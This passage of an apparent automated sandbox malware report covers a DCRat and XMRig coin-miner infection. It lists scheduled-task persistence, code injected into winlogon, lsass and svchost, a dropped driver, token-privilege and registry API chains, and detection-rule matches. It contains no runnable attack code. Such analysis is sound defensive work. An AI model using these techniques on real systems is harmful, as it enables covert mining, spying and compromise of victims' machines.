Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\ComComponentDriverIntoC
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\ComComponentDriverInto

Source: C:\Windows\System32\svchost.exe

File deleted: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0007848E	3_2_0007848E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00086CDC	3_2_00086CDC
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00084088	3_2_00084088
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_000800B7	3_2_000800B7
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_000740FE	3_2_000740FE
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00087153	3_2_00087153
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_000951C9	3_2_000951C9
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_000862CA	3_2_000862CA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_000732F7	3_2_000732F7
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_000843BF	3_2_000843BF
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0007C426	3_2_0007C426
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0009D440	3_2_0009D440
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0007F461	3_2_0007F461
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_000877EF	3_2_000877EF
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0007286B	3_2_0007286B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0009D8EE	3_2_0009D8EE
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0007E9B7	3_2_0007E9B7
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_000A19F4	3_2_000A19F4
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00083E0B	3_2_00083E0B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00094F9A	3_2_00094F9A
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0007EFE2	3_2_0007EFE2
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF163B23C	6_2_000001EDF163B23C
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF16320DC	6_2_000001EDF16320DC
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF163B030	6_2_000001EDF163B030
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF1641658	6_2_000001EDF1641658
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF163F2F8	6_2_000001EDF163F2F8
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF1662CDC	6_2_000001EDF1662CDC
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF166BE3C	6_2_000001EDF166BE3C
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF166BC30	6_2_000001EDF166BC30
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF1672258	6_2_000001EDF1672258
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF166FEF8	6_2_000001EDF166FEF8
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E097380	6_2_00007FF77E097380
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E087C50	6_2_00007FF77E087C50
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E097060	6_2_00007FF77E097060
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E08BC96	6_2_00007FF77E08BC96
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E096D30	6_2_00007FF77E096D30
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E0885B0	6_2_00007FF77E0885B0
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E0979D0	6_2_00007FF77E0979D0
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E0969F0	6_2_00007FF77E0969F0
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E09FA8C	6_2_00007FF77E09FA8C
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E0976A0	6_2_00007FF77E0976A0
Source: C:\Windows\System32\dialer.exe	Code function: 20_2_00007FF62DC32328	20_2_00007FF62DC32328
Source: C:\Windows\System32\dialer.exe	Code function: 20_2_00007FF62DC314E4	20_2_00007FF62DC314E4
Source: C:\Windows\System32\dialer.exe	Code function: 20_2_00007FF62DC326E8	20_2_00007FF62DC326E8
Source: C:\Windows\System32\dialer.exe	Code function: 20_2_00007FF62DC31DB4	20_2_00007FF62DC31DB4
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F85B030	24_2_000001881F85B030
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F85F2F8	24_2_000001881F85F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F85B23C	24_2_000001881F85B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F861658	24_2_000001881F861658
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8520DC	24_2_000001881F8520DC
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F88BC30	24_2_000001881F88BC30
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F88FEF8	24_2_000001881F88FEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F88BE3C	24_2_000001881F88BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F892258	24_2_000001881F892258
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F882CDC	24_2_000001881F882CDC
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8BB030	24_2_000001881F8BB030
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8BF2F8	24_2_000001881F8BF2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8BB23C	24_2_000001881F8BB23C
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8C1658	24_2_000001881F8C1658
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8B20DC	24_2_000001881F8B20DC
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CD7CF2F8	28_2_00000264CD7CF2F8
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CD7D1658	28_2_00000264CD7D1658
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CD7CB23C	28_2_00000264CD7CB23C
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CD7CB030	28_2_00000264CD7CB030
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CD7C20DC	28_2_00000264CD7C20DC
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE6FEF8	28_2_00000264CDE6FEF8
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE72258	28_2_00000264CDE72258
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE6BE3C	28_2_00000264CDE6BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE62CDC	28_2_00000264CDE62CDC
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE6BC30	28_2_00000264CDE6BC30
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDECFEF8	28_2_00000264CDECFEF8
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDED2258	28_2_00000264CDED2258
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDECBE3C	28_2_00000264CDECBE3C
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDEC2CDC	28_2_00000264CDEC2CDC
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDECBC30	28_2_00000264CDECBC30
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC42DB23C	30_2_000001BEC42DB23C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC42E1658	30_2_000001BEC42E1658
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC42DF2F8	30_2_000001BEC42DF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC42DB030	30_2_000001BEC42DB030
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC42D20DC	30_2_000001BEC42D20DC
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC430BE3C	30_2_000001BEC430BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC4312258	30_2_000001BEC4312258
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC430FEF8	30_2_000001BEC430FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC430BC30	30_2_000001BEC430BC30
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC4302CDC	30_2_000001BEC4302CDC
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37D1658	31_2_0000023BF37D1658
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37CB23C	31_2_0000023BF37CB23C
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37C20DC	31_2_0000023BF37C20DC
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37CB030	31_2_0000023BF37CB030
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37CF2F8	31_2_0000023BF37CF2F8
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37FBE3C	31_2_0000023BF37FBE3C
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF3802258	31_2_0000023BF3802258
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37F2CDC	31_2_0000023BF37F2CDC
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37FBC30	31_2_0000023BF37FBC30
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37FFEF8	31_2_0000023BF37FFEF8
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF3A6B23C	31_2_0000023BF3A6B23C
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF3A71658	31_2_0000023BF3A71658
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF3A620DC	31_2_0000023BF3A620DC
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF3A6B030	31_2_0000023BF3A6B030
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF3A6F2F8	31_2_0000023BF3A6F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935CDDB030	32_2_000001935CDDB030
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935CDD20DC	32_2_000001935CDD20DC
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935CDDF2F8	32_2_000001935CDDF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935CDDB23C	32_2_000001935CDDB23C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935CDE1658	32_2_000001935CDE1658
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935D532CDC	32_2_000001935D532CDC
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935D53BC30	32_2_000001935D53BC30
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935D53BE3C	32_2_000001935D53BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935D542258	32_2_000001935D542258
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935D53FEF8	32_2_000001935D53FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55920DC	34_2_000001B1E55920DC
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E559B030	34_2_000001B1E559B030
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E559F2F8	34_2_000001B1E559F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55A1658	34_2_000001B1E55A1658
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E559B23C	34_2_000001B1E559B23C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55C2CDC	34_2_000001B1E55C2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55CBC30	34_2_000001B1E55CBC30
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55CFEF8	34_2_000001B1E55CFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55D2258	34_2_000001B1E55D2258
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55CBE3C	34_2_000001B1E55CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E5C92CDC	34_2_000001B1E5C92CDC
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E5C9BC30	34_2_000001B1E5C9BC30
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E5C9FEF8	34_2_000001B1E5C9FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E5CA2258	34_2_000001B1E5CA2258
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E5C9BE3C	34_2_000001B1E5C9BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFA8B23C	35_2_0000021CAFA8B23C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFA91658	35_2_0000021CAFA91658
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFA820DC	35_2_0000021CAFA820DC
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFA8B030	35_2_0000021CAFA8B030
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFA8F2F8	35_2_0000021CAFA8F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFABBE3C	35_2_0000021CAFABBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFAC2258	35_2_0000021CAFAC2258
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFAB2CDC	35_2_0000021CAFAB2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFABBC30	35_2_0000021CAFABBC30
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_0000021CAFABFEF8	35_2_0000021CAFABFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB74B030	36_2_000001E7BB74B030
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB7420DC	36_2_000001E7BB7420DC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB751658	36_2_000001E7BB751658
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB74B23C	36_2_000001E7BB74B23C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB74F2F8	36_2_000001E7BB74F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB77BC30	36_2_000001E7BB77BC30
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB772CDC	36_2_000001E7BB772CDC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB782258	36_2_000001E7BB782258
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB77BE3C	36_2_000001E7BB77BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB77FEF8	36_2_000001E7BB77FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB7DBC30	36_2_000001E7BB7DBC30
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB7D2CDC	36_2_000001E7BB7D2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB7E2258	36_2_000001E7BB7E2258
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB7DBE3C	36_2_000001E7BB7DBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_000001E7BB7DFEF8	36_2_000001E7BB7DFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_000002356054BC30	37_2_000002356054BC30
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_0000023560542CDC	37_2_0000023560542CDC
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_0000023560552258	37_2_0000023560552258
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_000002356054BE3C	37_2_000002356054BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_000002356054FEF8	37_2_000002356054FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_00000293F7FCBC30	38_2_00000293F7FCBC30
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_00000293F7FCFEF8	38_2_00000293F7FCFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_00000293F7FD2258	38_2_00000293F7FD2258
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_00000293F7FCBE3C	38_2_00000293F7FCBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_00000293F7FC2CDC	38_2_00000293F7FC2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE81520DC	39_2_000001ECE81520DC
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE815B23C	39_2_000001ECE815B23C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE8161658	39_2_000001ECE8161658
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE815F2F8	39_2_000001ECE815F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE815B030	39_2_000001ECE815B030
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE8182CDC	39_2_000001ECE8182CDC
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE818BE3C	39_2_000001ECE818BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE8192258	39_2_000001ECE8192258
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE818FEF8	39_2_000001ECE818FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_000001ECE818BC30	39_2_000001ECE818BC30
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C671B030	40_2_00000223C671B030
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C67120DC	40_2_00000223C67120DC
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C671B23C	40_2_00000223C671B23C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C6721658	40_2_00000223C6721658
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C671F2F8	40_2_00000223C671F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C674BC30	40_2_00000223C674BC30
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C6742CDC	40_2_00000223C6742CDC
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C674BE3C	40_2_00000223C674BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C6752258	40_2_00000223C6752258
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_00000223C674FEF8	40_2_00000223C674FEF8

Source: Joe Sandbox View

Dropped File: C:\Program Files\Google\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: String function: 0008F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: String function: 0008EC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: String function: 0008EB78 appears 39 times

Source: ylbujkauzmzd.tmp.2.dr

Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: hs.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: updater.exe.2.dr	Static PE information: Number of sections : 11 > 10

Source: launcher.exe.bin.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 43.2.updater.exe.7ff695774ea0.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 43.2.updater.exe.7ff695774ea0.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 43.2.updater.exe.7ff695774ea0.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 43.2.updater.exe.7ff69572fa80.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 43.2.updater.exe.7ff69572fa80.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 43.2.updater.exe.7ff69572fa80.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 43.2.updater.exe.7ff695750c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 43.2.updater.exe.7ff695750c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 43.2.updater.exe.7ff695750c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 43.2.updater.exe.7ff695710000.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 43.2.updater.exe.7ff695710000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 43.2.updater.exe.7ff695710000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002B.00000002.2633864515.00007FF69572C000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\ylbujkauzmzd.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\ylbujkauzmzd.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Temp\ylbujkauzmzd.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: ComComponentDriverInto.exe.3.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@79/108@0/0

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00076C74 GetLastError,FormatMessageW,

3_2_00076C74

Source: C:\Windows\System32\dialer.exe

Code function: 20_2_00007FF62DC32328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

20_2_00007FF62DC32328

Source: C:\Windows\System32\dialer.exe

Code function: 20_2_00007FF62DC31AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

20_2_00007FF62DC31AC4

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_0008A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

3_2_0008A6C2

Source: C:\Users\user\AppData\Local\Temp\hs.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5772:120:WilError_03
